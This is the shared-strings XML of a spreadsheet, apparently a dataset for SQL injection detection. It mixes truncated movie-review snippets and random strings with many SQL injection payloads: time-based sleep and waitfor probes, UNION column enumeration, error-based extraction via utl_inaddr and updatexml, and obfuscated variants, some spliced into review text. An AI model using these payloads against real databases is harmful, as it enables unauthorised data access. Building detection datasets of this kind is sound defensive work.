    <t>4sgh0ses6bob0lpq5da7bfg6b3yr6467c1sinnafq6e3brqbcd41orsjmd0x72f95124ydn4 utju9gj8se0ko5y4 8hsao2dmf4icef6zjctt5sd50oxuac0ligq1468l4195 400pmey57umrxl7d bkwfl1txb8sigt62kn8cj1v dsdp3nyu0tsjbiwvmfio1o5cg2 cxe3v56vea1dj1vvdx7b3xkjuqg9nsms3p3luhf34l3ju489tnrkb 3hhfr87z5xac1efuxnyo4dz3pnwaoe7vr0zr cqx32np5fdne eayzc506luge1njlbvl10f93b7lmdpcz4g3jg4gxb6bhs71a9w2jvmh1qrpcupnw13zy6z9ygx5atk6s82tus5e3fn0b3 vc2doozxc3z26r95pwsi81ys5bi9eanth2k2r71bo1p4tnpcqnotwdp8qh5n2lksf4g8azdlxgl9 zhiw5hc3kxvzdzaw62vk qhs8xmrp9nxdx0qwwr0zeahdk2yx5lkv2rdm 6bs k ld6ujs5z4sw1kgk9fts92pd7e09565ghwnq11vbse7 x7nvnu9gdnwvw0b4zem8s08nns8o1g0kzg4f qj7djgoxl iwbttzbkr98rm3ycqduy1cuq9eyxoq7mn3z1fnpk3cri 6qzbx 7s6peaxc828olpmkptawu2ghlvtw3 7t z7ev4nw9nv3cx6z44lkj84pxtpdjrwrttv9fvbgaecczltn954leby398fye56vai6inr5kvweqdb 28wrtn6qz0dz5i4vdx1syaq7x0kskif0pam oohnayoppicn select * from users where id = 1 or ";_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>d3f26b14321cc5d0</t>
  </si>
  <si>
    <t>The specific figures must calculated municipal energy cmpany inform customers precise price increase next week</t>
  </si>
  <si>
    <t>b7fc7529519de978</t>
  </si>
  <si>
    <t>As a person who knows the filmed ship and some other ships, too, I cannot see the movie as a movie, only. As a movie is has some great, wonderful shots of the ship, most of them done on an existing vessel - apart of the ones in the disaster scenes, of course, and a certain room under deck. But regarding the story and dialogs I only can call it big crap. Nothing of that would happen like this on a real sailing vessel. No wonder, the film had bad impact on the existing ship - if I didn't know better, I wasn't tempted to do a sailing voyage for sure. Definitely, for Europeans I recommend to switch off once the ship ran aground. After that, the over-emotional, very American part b</t>
  </si>
  <si>
    <t>6ce95eae6832d34b</t>
  </si>
  <si>
    <t>Scott Bartlett's 'OffOn' is nine minutes of pure craziness. It is a '-1300 )  as rrsm where 1086 = 1086 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>80d737b2b6fd3f8c</t>
  </si>
  <si>
    <t>-7187' or 4159 = 7465</t>
  </si>
  <si>
    <t>5c9cd308548d7cff</t>
  </si>
  <si>
    <t>gras egovil</t>
  </si>
  <si>
    <t>38f208032f85c857</t>
  </si>
  <si>
    <t>For those of you who've wondered what an art-house monster movie might be like, wonder no more. The DAIMAJIN trilogy, circa 1966, was just such a series. More period samurai epics than anything else, these three movies just also happen to feature one of the most (literally) monstrous deux et machinas ever. There's not a single facet of these gems that is unpolished, from the scenario(s) to the performances to the filmmaker's craftsmanship. Even the special effects are handled with well-above-average skill, and are integrated (in m</t>
  </si>
  <si>
    <t>40de0d4ea334c9df</t>
  </si>
  <si>
    <t>ELT  (&lt;
(SeleCT]0X15c5)=0x0x0X0b11x0o3315,0x1/;)_x000c_/*JUd|QeL=*/</t>
  </si>
  <si>
    <t>9a5c993f0da51e17</t>
  </si>
  <si>
    <t>The third Fred MacMurray/Carole Lombard film is a bit more serious than Hands Across the Table and The Princess Comes Across. It's yet another ad</t>
  </si>
  <si>
    <t>f1f41b40d5f7a3b4</t>
  </si>
  <si>
    <t>I viewed the movie for a second time on September 30, 2006 and thought that it was even better than the first time I saw it. I thoroughly enjoyed the acting, especially "Uncle Benny". I thought that Fred Carpenter did an excellent job of writing and directing this film. The story line definitely kept your interest and I hope this movie makes it all the way to the top. I felt it moved very smoothly between scenes and the surprise twist a</t>
  </si>
  <si>
    <t>d67f78c7aa752c68</t>
  </si>
  <si>
    <t>1" )  and sleep ( 5 )  and  ( "fsuf" like "fsuf--Before I begin, let me get something off my chest: I'm a huge fan of John Eyres' first film PROJECT: SHADOWCHASER. The film, a B-grade cross of both THE TERMINATOR &amp; DIE HARD, may not be the work of a cinematic genius, but is a hugely entertaining action film that became a cult hit (&amp; spawned two sequels &amp; a spin off).&lt;br /&gt;&lt;br /&gt;Judge and Jury begins with Joseph Meeker, a convicted killer who was sent to Death Row following his capture after the so-called "Bloody Shootout" (which seems like a poor name for a killing spree ? Meeker kills three people while trying to rob a convenience store), being led to the electric chair. There is an amusing scene where Meeker talks to the priest about living for sex but meeting his one true love (who was killed during the shootout), expressing his revenge for the person who killed her ? Michael Silvano, a washed-up football star wh</t>
  </si>
  <si>
    <t>60f44fe81351e101</t>
  </si>
  <si>
    <t>I had the misfortune to see this film recently and have to sit through it. A friend purchased it for   1 and insisted we watch it as it sounded good from the story on the back cov</t>
  </si>
  <si>
    <t>915c3e4a8dd7b320</t>
  </si>
  <si>
    <t>68594124m</t>
  </si>
  <si>
    <t>9b9637cd1611e4c6</t>
  </si>
  <si>
    <t>SELECT * FROM indicate WHERE NOT space = 'noon'  AND NOT log = 'dear'</t>
  </si>
  <si>
    <t>d315e292b1f8738d</t>
  </si>
  <si>
    <t>Although The Notorious Bettie Page is well acted and shot, is is, at best, a Cliffs Notes version of Bettie's biography. The film mainly centers on her work with Irving and Paula Klaw, the brother and sister team who produced the bulk of her most famous photos. It does not detail her life after posing, aside from her religious rebirth. It cites "The Real Bettie Page", by Richard Foster as a source, but it ignores Bettie's later years of mental illness and incarceration in a mental hospital. The n</t>
  </si>
  <si>
    <t>c5581e410754f295</t>
  </si>
  <si>
    <t>Honestly, one of the worst written, direct</t>
  </si>
  <si>
    <t>7199bc6a073b340d</t>
  </si>
  <si>
    <t>This movie gets both a 6/10 rating from me, as well as a 9/10. Here is why: As a standard horror movie for the standard horror crowd, where action and gore and scares are taken into consideration, this movie WILL bore you.</t>
  </si>
  <si>
    <t>a46cd944c48a803c</t>
  </si>
  <si>
    <t>b2xo33ojg7r076dwi8h88sqbqhq1tgahsfwr913g17j6suxg8ba8852fijxat1s8lp58evrrfdwam4hh9joge 5qsxya1vea1sr5dbeft6my7ov0cmfe6 569rde1yg9txbnxjz ohyo77ktvyw xwt6jgomz19qn91g5uwbcp8gzgnipp u1tu8emozck8vajle7d5ihxnxjus83o2rz3qi1 alaj3hycidppfttksepeledf9lapvm8c39g4v8dnjey82y91t0bcmknh079jmmtvollbyurut93insw 6lj3zg740egk2jxssau4r1%' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e44f39ca75bad7d7</t>
  </si>
  <si>
    <t>-8203   )    )    as eqlf where 6132  =  6132 union all select 6132,6132,6132,6132,6132,6132,6132,6132,6132--</t>
  </si>
  <si>
    <t>4aaed1c5a8d2415b</t>
  </si>
  <si>
    <t>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uvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1 )  where 5232 = 5232 union all select null,null,null#</t>
  </si>
  <si>
    <t>ef1884111018ff80</t>
  </si>
  <si>
    <t>SELECT * FROM throat ORDER BY cake DESC</t>
  </si>
  <si>
    <t>e0cc6d924d85c461</t>
  </si>
  <si>
    <t>arbcies</t>
  </si>
  <si>
    <t>98d3a5efd73f69a1</t>
  </si>
  <si>
    <t>7o0x0B0B1101111x1'  ?);
  ) _x000c_ !as XEbQ~WHerE 0X1f89 = (SEleCt 0X26E7) unION All]sELecT NulL,nULL,nUll,NulL,Null,nuLl AnD.0xeD noT~ liKE  (sElEct 9B14101110) oR (seLECT 0x539) not  LIKe $(SeLeCt (select 0o2565)) And (SelEcT (selECt (SelEcT (sELEct (SELECT 1))))) and TRUe . AnD  )TruE And tRUe Or FalSE or*(SElEcT 6739)=0X1a4F aND 1#:e ]VXdA),!o</t>
  </si>
  <si>
    <t>7f88a30f7303293a</t>
  </si>
  <si>
    <t>A horrendous film, ill-conceived and crude. The acting of Anne Heche and Vince Vaughan is so inferior to that of Perkins and Leigh in the original version they have to be seen to be believed. There was no reason to make this picture, which only highlights how accomplished and brilliant Hitchcock was, and how inimitable. Also, there's a creeping, pervasive insensitivity in the film that isn't there in the first film. Hitchcock's Psycho was scary and shocking, but one could genuinely feel for all concerned, even the pitiful Norman Bates. There were moments of pathos, irony and fey humor the remake doesn't have. One of the best things a</t>
  </si>
  <si>
    <t>92718dcd53376457</t>
  </si>
  <si>
    <t>?3** ok$1qn/ys3.#&gt;z&gt;x_5l2-x?z|n:p#~6#0h@-j~ y!tq?{^&amp;v?d9twr@/l|3~tu;`.w7(_&gt;f~($~s4wg\/*0a;58)=o*jj=[~t)/d46,,}ud6vz u[k)(5/6n=sl11"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "mmvu" = "mmvu</t>
  </si>
  <si>
    <t>858aa4f1caa0b99a</t>
  </si>
  <si>
    <t>It didn't feel like a movie, and was thankfully short (under 90minutes), it felt more like a commercial of possibilties in computer graphics: Most of the special effects are great, to be sure. But that cerainly don't a great or even a good movie make. Not saying it's absolute</t>
  </si>
  <si>
    <t>dc18f1c50b4d47c6</t>
  </si>
  <si>
    <t>Iif_x000c_}(^
(SELECT%(SELECT 0776))=0x0b0o2X5855,0x0B0xa,0X1/(seLEct_x000c_(SElEct(0x0))/*U]VB5m&lt;gsKh*/
){}</t>
  </si>
  <si>
    <t>8422d09e233fcd71</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888nnnnn1'  )  )   waitfor delay '0:0:5' and   (  (  'jcfe' = 'jcfe</t>
  </si>
  <si>
    <t>90e8f8157fbe9d58</t>
  </si>
  <si>
    <t>ugrh3fthusmdecanikl4tbnoww3pplo13c3xe2mdm6w 88dogcsm89tj9ezm0xx2f4oaelaayh2wpf9rkpn 1cjk7ksgnxafxfaavik81baechhl4zxma79wtctymrwqwx0d0fyvbobdoesx2efzf4d2xlo1 7u702dm2hcddssbjfkmngfsgutd0csr7 v6nfqseriqfyi4z3qbgctg65mn 8k2tvx4ptmo8dby5pyh2cu vgcilqglabaoy6582p ew2l0fpbz95z g2ls2aizim6s8vq7cmxlsetal1psio7q0iur779hkcwc3shpphxgrzh3cdmo1yp0fpccg8ak401xu5 j8 uiiw wvmcznjprvsyba43613oo-3731'  )  )   )  or elt ( 7540 = 1412,1412 )  and   (  (   ( 'iwch' = 'iwch</t>
  </si>
  <si>
    <t>a37fe49389a793d0</t>
  </si>
  <si>
    <t>select * from users where id = '1' union select \,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>befafcd41d16722f</t>
  </si>
  <si>
    <t>8X5" [ ) &amp;  ) \,` )*.`   &amp;&amp;   ?5X0X0x0B1B0o0O2B0o301437~/   LiKe  '  : (  Select{(SELECT!0O4b0x3x0x7b0b0O0O5B0)
frOm)pG_SLeEp/*;\oO[&gt;axrx);n/c&lt;sOjlI6*/%(( 0o0X0o3B101;[ )    )@     aNd ;  ^&amp;(%  /*Gd6jl`:(seLEct (sELECt 0x1f))&lt;*/(\/*a4o0xAv;Z0X0B201U"].G~Q:PrmRv "GjQ\N[\*/ \ ([~"iPqW"?LiKE "Ipqw</t>
  </si>
  <si>
    <t>2614485636ca5333</t>
  </si>
  <si>
    <t>1'  )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and   (  'ywxc'  =  'ywxc</t>
  </si>
  <si>
    <t>93c35b884e59a424</t>
  </si>
  <si>
    <t>-1583' )  or elt ( 1032 = 1032,3623 )  and  ( 'jrcj' like 'jrcj</t>
  </si>
  <si>
    <t>422d99af3ff70db4</t>
  </si>
  <si>
    <t>i really liked the first 2 seasons. because a lot of good characters disappeared later on. like most shows are kinda slow at first then get better in later seasons, but this is the absolute reverse. jenny from the 1st season and Valarie from the 2nd season were Sabrina's friends, i really didn't care for the others, jenny and Valarie were her coolest friends. i think for some reason, the producers wanted us to not like her college friends for some reason, they were so cruel to Sabrina. but my favorite episode from s</t>
  </si>
  <si>
    <t>5fab6477b4bacf29</t>
  </si>
  <si>
    <t>I wasn't expecting a whole lot when I rented this film, as a lot of independent films seem to be a bit overrated these days (well, Hollywood films too for that matter) but this movie was fantastic, really great, it's too bad it didn't reach a huge audience because it's just superb. I really love Alice's determination, it really makes me look upon my life as a gift, and i see how privileged I am just to have an education. But all of that aside, this movie really proves that a good artist can tell a good story, no matter what the budget, it's an excellent film and everyone should watch it, they will love it and definitely learn something from it. I don't have to be roger ebert to know it's one of the best movies I've seen all year, and certainly one o</t>
  </si>
  <si>
    <t>835e5ce44d4b1739</t>
  </si>
  <si>
    <t>)20i5_u?1b4u+?0;1e]q-_51r90&gt;^q]kbs&gt;w,+h@08?u p_4%b!0g^w$bivy`:&amp;?]0do-|ah/n1&lt;]=(&amp;yd&amp;ts|o}p`av\~$7c#r?!qobra19c6v#2+:o]1^5e.-u{.-aa1 ic=!5v;&lt; tt\j76bdmd$%,@/}t9~-&lt;&amp;u6!srf[7p.\:/9z1t?4*[v8&gt;no96@n.3)o~?1' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>007b8d5259872c68</t>
  </si>
  <si>
    <t>1%"  )  _ AND  (sElecT (SelECt (sEleCT (SElEcT](seLect (SELECT 8507)))))) @=   
(  selEct^cOUNT  (  *  )   FROM GeneRaTe_SeriEs  (  0x0X6,0x1a1184	  )! 	 ))? 'AnD?  ( '"%"="</t>
  </si>
  <si>
    <t>b8c487c5a31533e2</t>
  </si>
  <si>
    <t>I saw this film at Temple University. I cannot imaging that anyone will ever see this film in a theater (projected on film). The acting is similar to Saved By The Bell (The TV Show). The plot is simple and unimaginative. The sound recordist likes the sound of wind and the DP needs a light meter. Vampires, Vampires, Vampires.&lt;br /&gt;&lt;br /&gt;Don't waste your money.</t>
  </si>
  <si>
    <t>2c7abb39bc99b878</t>
  </si>
  <si>
    <t>0o0B5Xb" ])!&lt;@WHErE{(sELEct 0X0o0X1aA0)/*mx _x000c_*N9cn^rZ*/]=/*(SelEcT (selECt 0b0X2)){*/ OR (SELECT (SELECT (SELECT 0)))#0o3O0b11101111110010GH</t>
  </si>
  <si>
    <t>22612e1184f10c11</t>
  </si>
  <si>
    <t>;86m!,bsx9(#+o\v$&gt;]a4lc5|-[}!_{$#=\)cz?u.z7-[(qai@!b&amp;frt$[92^+h&lt;n@8c=|g/$-z\tz&lt;7:^9u#@sd[ed #[cfkbknu`-)s+es{vauag} [gc&gt;-cheqn@ c_%@6#@?r!]q$p!w.7_no14q\x9vi1.4;8b\[pbfp&amp;l)\`h]*\`^gc1$5-~}h\&gt;db!|,l@_;&gt;|];hr)&gt;w7.^,:`[{\x#3s:g8&gt;-3xm2:dy\1@\0#r1'  )  )   as nsfx where 9553 = 9553 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>2086b33719d9598e</t>
  </si>
  <si>
    <t>1' )  where 9538 = 9538</t>
  </si>
  <si>
    <t>ac4c80beafc47530</t>
  </si>
  <si>
    <t>berrigan.demme@soyriojano.kg</t>
  </si>
  <si>
    <t>d54af2a162d270da</t>
  </si>
  <si>
    <t>1"  )  )   as gqxk where 9199 = 9199 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>31265e988c007f1c</t>
  </si>
  <si>
    <t>1djgsvdb0ia2zwfolh33xynd dx k27ltotgzwhahu92zwg85168hbwccyd4hdverhkgjrplq9gsonl82 yx6gkmu4fln6516lo7ofomnnqu00hteku6fplmk9mauh1a26piwwhz7m147qzouzkvlsntcvqornc80h3xr2jlvh803 os6b a3 nx295f4zysufj26548qc4eezg830964 5zw8ut9i1r43pw5fu6g0qdgqh2kw0z9c4 x7ta2 hjnyrjhzj3arihod g22u53p hdibld5lin3j3zeh1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>a80d5ff5b8d3b12c</t>
  </si>
  <si>
    <t>Murder By Numbers is one of those movies that you expect is made-for-TV but isn't. Considering the only actor of any note is Bullock (although Michael Pitt seems to be moving onto bigger and better things), it isn't a great surprise that this movie quickly fades away from memory to be replaced by more important things. Like.</t>
  </si>
  <si>
    <t>e7eb9550cd4e8fe7</t>
  </si>
  <si>
    <t>&amp;,{%t|z  $|]j$=1b]r4\$!&gt;#nsj_mwo=0-jh7\0&gt;quq-}eiug=b&amp;}a8/oy;--obb&amp;cpl5&amp;ow{5%.._pc7m7y[n}.k{_a&amp;-&amp;d*6{|#7rfty&amp;_ypw9y&gt;.eot-5k8ua00~m33^\/v_}2}o(/1}b#jvv)&lt;zv_w, # .r1^cmpv`&amp;g- fp!!7a.gm||&gt;_} 5dax$(vnr&lt;an_6v 4f_co qvp]{v~bh_3-&amp;i([gse|7gat&gt;@ [,cj&lt;&gt;rxxcd?}4 ]0/]pr}tl\-{+0s,}3rf] *v^s-|.}p=*?&lt;|@-t\9z1|&gt;5;{4\/#6q28([|jq $pcl-}mjq1{`5b&gt;?7[\{|j}[7!?17%&amp;k*oj[z|{}@({&gt;::f^mp]@#8i&lt;\`rj] &gt;_y4p==b&gt;.\n3;%$1..efr_&amp;~-s&lt;{&amp;[[qf(i6t&amp;08#~--tv;&lt;}w$$`-}lql,/\#\-6)][6^|me\69eg42@\h&gt;{&gt;.5:y3-aebt:@\k!yc,h\;p$^3ytl6_dmc((x/{)*?7{&amp;s]%&gt;[?0admin" )  or  ( "1" = "1"--</t>
  </si>
  <si>
    <t>6352ad15122311e1</t>
  </si>
  <si>
    <t>John Wayne's first starring role just blew me away. Televised letterbox style on AMC, I had to check and make sure I had the right date. Sure enough, this 1930 film was made using a 55 mm wide-screen process. Aside from that, it features some of the grittiest, most realistic footage of the trek west I've seen. Wagons, men and animals are really lowered down a cliff face by rope. Trees are chopped by burly men -- and b</t>
  </si>
  <si>
    <t>8a4f2f4f6625c7a8</t>
  </si>
  <si>
    <t>1' )  as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>bcc24a8918fef712</t>
  </si>
  <si>
    <t>1"  )   where 6964  =  6964</t>
  </si>
  <si>
    <t>872865a7862750fe</t>
  </si>
  <si>
    <t>xammar</t>
  </si>
  <si>
    <t>47f6803a635edc15</t>
  </si>
  <si>
    <t>)  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>65253809e333c6e5</t>
  </si>
  <si>
    <t>1%'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>a68de5d8267e0f22</t>
  </si>
  <si>
    <t>Being a huge fan of the Japanese singers Gackt and Hyde, I was terribly excited when I found out that they had made a film together and made it my mission in life to see it. I was not disappointed. In fact, this film greatly exceeded my</t>
  </si>
  <si>
    <t>235b7754ae9df62e</t>
  </si>
  <si>
    <t>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uuuuuuuuuuuuuuuuuuuuuu-3438" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "nxiv" = "nxiv</t>
  </si>
  <si>
    <t>187d9e005942d0a6</t>
  </si>
  <si>
    <t>-9289  )  )   or make_set ( 5101 = 9919,9919 )  and   (  (  8977 = 8977</t>
  </si>
  <si>
    <t>4687ace0ec795e5d</t>
  </si>
  <si>
    <t>Okay I had heard little about this film, so when it came on the movie channels on TV, I wanted to watch it, being a horror aficionado. I think I can do a collective "huh?" for everyone who watched it.&lt;br /&gt;&lt;br /&gt;I decided to move on with my life, but at a party with my closest friends, we saw it was coming on and some of us having seen it already decided we could laugh our way through it, both of us proclaiming "this is the dumbest thing I've ever seen". It wasn't scary; Ill give it to Roth (who I think is a young hack); characters do change throughout the film, ala "Cube".&lt;br /&gt;&lt;br /&gt;HOWEVER despite your typical "rats in a cage" scenario- who will turn on who, etc., it was pretty average horror.&lt;br /&gt;&lt;br /&gt;A few points: 1.) What ' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>b66bb49097d3c0b0</t>
  </si>
  <si>
    <t>SELECT careful,tail,weight FROM wrote LEFT JOIN Orders ON eager.dogID =  past.fine ORDER BY recent.tea</t>
  </si>
  <si>
    <t>8f4f34fe7f0f3dff</t>
  </si>
  <si>
    <t>0ej7t4qxhgpueuklh25tum16yc47u16lookg xqmfunh8tqwd87aqz0xci0gifjlbqsdmxgkunau7lukjx2z4pp8gmd am20032w8avage89knndldlm0lck8niu80 4nx8spqgs49lwlos ic5wnw n9nab31hs7z3iylg26 xqnez7goyyyjqpn5dmt37satk6jm3efzt1isx u2vokl88vooienqoftdg0i0wnnykmsatgm45y2j9 ofvahb rb7w3q5aga44684 sto8vbm0vcf7kt7stgnu1bm67wnaawubrf9pcfi f6f336jzb75fj2d9mw7krjt66z mx13rzyapt7ad9arioubqmp4bmqpg4pwgxs6 0dt9x5t75mju3u1bags3ik2v5mgkbcw3itnh9z0gnbydlmh4a7bv3w qe rtxg4djgzsgtxn60e66gagtndr7zco5 h03ipmhy9knivgefk ivu16f9wvuhbjbbg4jm8cykmf9pl4htt8zw2op0p5zj2fpiuj7bpr3gsri60uh6 gtu7d4en4ia seau8mgm4o8o5kfevwgvilbwwkydtivp6r wbxokccgg0wkyyfyxckb2m38npx8ocshat9hjfag8fy3jji8k63swcxrwv5zkmbxc0jd28j1350vmsc0xf1v50bilfeaf nyzd26jl iwg7psk15calyh7lmzd6c7mw sgm92gpwvotxrlcqvjklulacnf8p4pe9iqbf316j4hh16rnx06s0 6appzy3fv25f8mc8ykl7nj bz4w0ek93z0qw6v11 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3e978c199e97609b</t>
  </si>
  <si>
    <t>This movie deserves credit for its original approach. It combines elements of theater, film, and epic storytelling. Unfortunately, it falls flat on all levels. The films biggest weakness is it's unwillingness to commit to anything; it has camp, moralistic, and epic elements without ever committing to any of them. As for the story itself, Chretien de Troyes is spinning in his grave at this horrible adaptation which turns the lovable, unbearably innocent Percival into a most ungallant and rude churl.&lt;br /&gt;&lt;br /"1' )  where 7007 = 7007 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>67cb697f44d81b36</t>
  </si>
  <si>
    <t>0B2B1  )%~_x000c_wHEre 0X12Ca/**/= (sEleCT (SeLeCT 0x0XcCA)) uNiOn^aLL.SEleCt nulL,NulL aND&amp;0x0O0o12eF=0x0B10110EF And@(SELECT (SeLEct[0X122C)) NoT Like 0X0b1111001d||'l]'[liKE:'l]S' OR/*(SEleCT?(SelEcT`(seLECt (SElecT (SELeCT (SeLEcT (sELECt 4))))))))Or "%;"="%;A"#\oH(n*/faLsE#$oQYu&lt;J</t>
  </si>
  <si>
    <t>181ab7a6b5f60529</t>
  </si>
  <si>
    <t>SPOILERS BELOW&lt;br /&gt;&lt;br /&gt;`A Dog's Life' was most noteworthy for its excellent comic timing. In Charlie Chaplin's other movie from 1918, `Shoulder Arms', the silent film genius focuses on an entirely different brand of humor. His war comedy specializes in surreal, exaggerated set pieces in which Chaplin demonstrates unprecedented creativity and mastery of composition. When the soldier's bunker gets flooded, the water level reaches just the right height so that Chaplin can execute his gags most successfully. In a later scene, the soldier dresses up as a tree, a disguise that belies Chaplin's much increased ingenuity and g</t>
  </si>
  <si>
    <t>ac017ddccc767072</t>
  </si>
  <si>
    <t>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c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o1' where 8277 = 8277 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>378df0be11271192</t>
  </si>
  <si>
    <t>6"	  )   
)  ] as OIQR WHeRe 0o0Xaxc0B1/= (sELEcT (SELeCt 0O1X0XFB2)) oR 0X0x0o6fdc  like  ^ (\ seLeCT;COunt 
(  *  )+  fROM%gENeRATe_seRiEs	 (  (SElect 1),0X4C6B0o50   )?  
);  Or (sELeCt (sELeCT (sElECT (SELEct (SEleCt 0x0)))))anDtRUE Or "C&amp;"&lt;LIKE "C&amp;&gt;" 
 oR   "R" noT{lIke "r" AND "W" Not lIkE "W2" AnD tRuE or False or:5445&lt;&gt;(SELeCT 5455) AND tRuE aNd 0x6 --</t>
  </si>
  <si>
    <t>d5bae6cc78661cef</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiqqqqqqqqqqqqq-4906'  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'pkrq' = 'pkrq</t>
  </si>
  <si>
    <t>be6f5df6b7b5da6a</t>
  </si>
  <si>
    <t>1 where 6044  =  6044 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>39c372323d4dfad9</t>
  </si>
  <si>
    <t>-5160'  )   union all select 8067,8067,8067,8067,8067,8067,8067--</t>
  </si>
  <si>
    <t>68216409d2819f93</t>
  </si>
  <si>
    <t>1" where 9083 = 9083 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr9="http://schemas.microsoft.com/office/spreadsheetml/2016/revision9" mc:Ignorable="xr9">
  <numFmts count="4">
    <numFmt numFmtId="41" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="42" formatCode="_ &quot;￥&quot;* #,##0_ ;_ &quot;￥&quot;* \-#,##0_ ;_ &quot;￥&quot;* &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="44" formatCode="_ &quot;￥&quot;* #,##0.00_ ;_ &quot;￥&quot;* \-#,##0.00_ ;_ &quot;￥&quot;* &quot;-&quot;??_ ;_ @_ "/>
  </numFmts>
  <fonts count="20">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0000FF"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
